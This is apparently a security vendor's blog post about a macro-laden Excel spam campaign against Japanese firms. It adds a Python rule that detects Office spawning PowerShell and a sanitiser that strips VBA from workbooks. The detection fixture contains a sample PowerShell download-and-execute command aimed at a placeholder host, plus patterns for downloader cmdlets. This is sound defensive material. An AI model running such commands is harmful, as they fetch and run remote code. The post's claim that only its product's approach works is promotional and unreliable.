March 04, 2018

A new malicious campaign targeting Japanese firms has been discovered by Votiro in collaboration with ClearSky, a cybersecurity consulting and intelligence company. The campaign consists of spam e-mails with malicious Excel workbooks attached; once a workbook is opened, its macros use PowerShell to download and execute a second-stage payload.
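The chain just described (Office document, macro, PowerShell, download of a second stage) leaves a characteristic trace in process-creation telemetry: an Office application as the parent of a script host. The following detection sketch is an added example written for this post, not Votiro's or ClearSky's tooling, and it runs over constructed events shaped like normalised Sysmon/EDR process-create records; the process names, field names, indicator list and the `example.invalid` URL are all assumptions made for the illustration.

```python
import re
from typing import Dict, List, Optional

# Constructed process-creation events, shaped like normalised EDR/Sysmon
# "process create" records. None of this is real telemetry from the campaign.
SAMPLE_EVENTS = [
    {"id": 1,
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoP -W Hidden -c \"IEX (New-Object Net.WebClient)"
                ".DownloadString('http://stage2.example.invalid/p')\""},
    {"id": 2,  # Excel launching the print spooler helper: benign
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "image": r"C:\Windows\splwow64.exe",
     "cmdline": "splwow64.exe 12288"},
    {"id": 3,  # PowerShell started by the shell, not by Office: benign
     "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\scripts\nightly-backup.ps1"},
    {"id": 4,  # Word -> cmd -> encoded PowerShell; base64 is a placeholder
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c powershell -enc QUFBQUFBQUFBQQ=="},
]

OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}

# Command-line traits that commonly accompany a macro-launched downloader.
CMDLINE_INDICATORS = {
    "download_cmdlet": re.compile(
        r"DownloadString|DownloadFile|Invoke-WebRequest|Start-BitsTransfer", re.I),
    "invoke_expression": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "encoded_command": re.compile(
        r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{8,}", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "remote_url": re.compile(r"https?://", re.I),
}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event: Dict) -> Optional[Dict]:
    """Return a finding when an Office process launches a script host; the
    score grows with the number of downloader-style traits on the command line."""
    if basename(event["parent"]) not in OFFICE_PARENTS:
        return None
    if basename(event["image"]) not in SCRIPT_HOSTS:
        return None
    reasons = ["office_spawned_script_host"]
    reasons += [name for name, rx in CMDLINE_INDICATORS.items()
                if rx.search(event["cmdline"])]
    return {"id": event["id"], "parent": basename(event["parent"]),
            "image": basename(event["image"]),
            "reasons": reasons, "score": len(reasons)}


def detect_office_spawned_script_hosts(events: List[Dict]) -> List[Dict]:
    """Run evaluate() over a batch of events and keep only the findings."""
    return [f for f in (evaluate(e) for e in events) if f is not None]


if __name__ == "__main__":
    for finding in detect_office_spawned_script_hosts(SAMPLE_EVENTS):
        print(f"event {finding['id']}: {finding['parent']} -> {finding['image']} "
              f"score={finding['score']} reasons={', '.join(finding['reasons'])}")
```

The parent/child relationship is the durable part of this rule; the command-line indicators only rank the hit, because attackers rename and obfuscate strings far more easily than they avoid spawning a script host from Excel. Expect some noise from legitimate add-ins that shell out, which is why event 2 is deliberately left unflagged.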

The spam may be in Japanese or English, but the workbooks are in Chinese, and the domain contacted to download the second-stage payload is registered in Hong Kong. That doesn't prove who the attackers are, since IP addresses and domains can be spoofed, but it's quite likely that the team behind this new campaign is based in China.

While we can make an educated guess at the hacker team's location, we're not yet sure what the second-stage payload is or what it does; further analysis will be required to determine that with certainty. That said, it appears to resemble various banking trojans, with the Zeus Panda banking trojan a prime suspect. Banks may be among the targets, but the campaign appears to be hitting companies in a wide variety of industries, including insurance, construction, marketing, industrial supplies, and more. Several members of the security community have run into this new scam as well; see this analysis of a tainted workbook in the Any.run sandbox.

Only Content Disarm and Reconstruction (CDR) can solve this: files are broken down into their lowest-level components, and the code in each component is analyzed for anomalies or other signs that could indicate hacker activity. Suspect code or components are dropped, and the file is reconstructed into a full, working version, allowing recipients to work with any file without having to worry about who sent it and what it can do. Whatever the senders of the suspect workbooks want from Japanese companies, they won't get it from the firms that use CDR to protect their systems.
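To make the "break down, drop the suspect component, rebuild" idea concrete, here is one disarm step applied to exactly the file type in this campaign: a macro-enabled workbook. This is an added example written for this post, not Votiro's CDR engine. It assumes the workbook is an OOXML package (a zip), builds a constructed, minimal stand-in for one in memory (the `vbaProject.bin` content is a placeholder, not real VBA), removes the VBA part, the content-type override that declares it, and the relationship that points at it, and retypes the workbook part so Excel treats the result as a plain workbook rather than a broken macro-enabled one. The function names are mine; the namespace URIs and content types are the standard OOXML/Office values.

```python
import io
import zipfile
import xml.etree.ElementTree as ET
from typing import List, Tuple

CT_NS = "http://schemas.openxmlformats.org/package/2006/content-types"
REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
SML_NS = "http://schemas.openxmlformats.org/spreadsheetml/2006/main"
VBA_CONTENT_TYPE = "application/vnd.ms-office.vbaProject"
VBA_REL_TYPE = "http://schemas.microsoft.com/office/2006/relationships/vbaProject"
MACRO_WORKBOOK_CT = "application/vnd.ms-excel.sheet.macroEnabled.main+xml"
PLAIN_WORKBOOK_CT = ("application/vnd.openxmlformats-officedocument"
                     ".spreadsheetml.sheet.main+xml")


def build_constructed_xlsm() -> bytes:
    """Constructed stand-in for a macro-enabled workbook: only the OOXML parts
    the sanitiser touches. Not a real Excel file; the VBA blob is a placeholder."""
    parts = {
        "[Content_Types].xml":
            f'<Types xmlns="{CT_NS}">'
            '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
            '<Default Extension="xml" ContentType="application/xml"/>'
            f'<Override PartName="/xl/workbook.xml" ContentType="{MACRO_WORKBOOK_CT}"/>'
            f'<Override PartName="/xl/vbaProject.bin" ContentType="{VBA_CONTENT_TYPE}"/>'
            '</Types>',
        "xl/workbook.xml": f'<workbook xmlns="{SML_NS}"><sheets/></workbook>',
        "xl/_rels/workbook.xml.rels":
            f'<Relationships xmlns="{REL_NS}">'
            '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/worksheet" Target="worksheets/sheet1.xml"/>'
            f'<Relationship Id="rId2" Type="{VBA_REL_TYPE}" Target="vbaProject.bin"/>'
            '</Relationships>',
        "xl/worksheets/sheet1.xml": f'<worksheet xmlns="{SML_NS}"><sheetData/></worksheet>',
        "xl/vbaProject.bin": b"CONSTRUCTED-VBA-PLACEHOLDER",
    }
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in parts.items():
            zf.writestr(name, data)
    return buf.getvalue()


def _strip_vba_content_types(xml_bytes: bytes) -> bytes:
    """Drop the vbaProject override and retype the workbook as a plain workbook."""
    ET.register_namespace("", CT_NS)
    root = ET.fromstring(xml_bytes)
    for override in list(root.findall(f"{{{CT_NS}}}Override")):
        ct = override.get("ContentType", "")
        if ct == VBA_CONTENT_TYPE:
            root.remove(override)
        elif ct == MACRO_WORKBOOK_CT:
            override.set("ContentType", PLAIN_WORKBOOK_CT)
    return ET.tostring(root, encoding="utf-8")


def _strip_vba_relationships(xml_bytes: bytes) -> bytes:
    """Remove every relationship that points at the VBA project."""
    ET.register_namespace("", REL_NS)
    root = ET.fromstring(xml_bytes)
    for rel in list(root.findall(f"{{{REL_NS}}}Relationship")):
        if rel.get("Type") == VBA_REL_TYPE:
            root.remove(rel)
    return ET.tostring(root, encoding="utf-8")


def sanitize_workbook(xlsm: bytes) -> Tuple[bytes, List[str]]:
    """Rebuild the package part by part without its VBA parts.
    Returns the new package bytes and the names of the parts dropped."""
    removed: List[str] = []
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(xlsm)) as src, \
         zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
        for info in src.infolist():
            name = info.filename
            data = src.read(name)
            if name.lower().endswith(("vbaproject.bin", "vbadata.xml")):
                removed.append(name)       # the suspect component is dumped
                continue
            if name == "[Content_Types].xml":
                data = _strip_vba_content_types(data)
            elif name.endswith(".rels"):
                data = _strip_vba_relationships(data)
            dst.writestr(name, data)       # everything else is copied through
    return out.getvalue(), removed


def list_parts(package: bytes) -> List[str]:
    with zipfile.ZipFile(io.BytesIO(package)) as zf:
        return zf.namelist()


def read_part(package: bytes, name: str) -> bytes:
    with zipfile.ZipFile(io.BytesIO(package)) as zf:
        return zf.read(name)


def has_vba(package: bytes) -> bool:
    return any(n.lower().endswith("vbaproject.bin") for n in list_parts(package))


if __name__ == "__main__":
    clean, dropped = sanitize_workbook(build_constructed_xlsm())
    print("dropped:", dropped, "| remaining parts:", list_parts(clean))
```

Removing the VBA project is only one of the disarm steps a production CDR pipeline performs; OLE-embedded objects, DDE formulas, external links and embedded files are handled the same way, component by component, and a workbook that contained nothing but legitimate macros comes out as a plain `.xlsx` that no longer runs them. Save the output with an `.xlsx` extension, since the content type has been changed to match.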

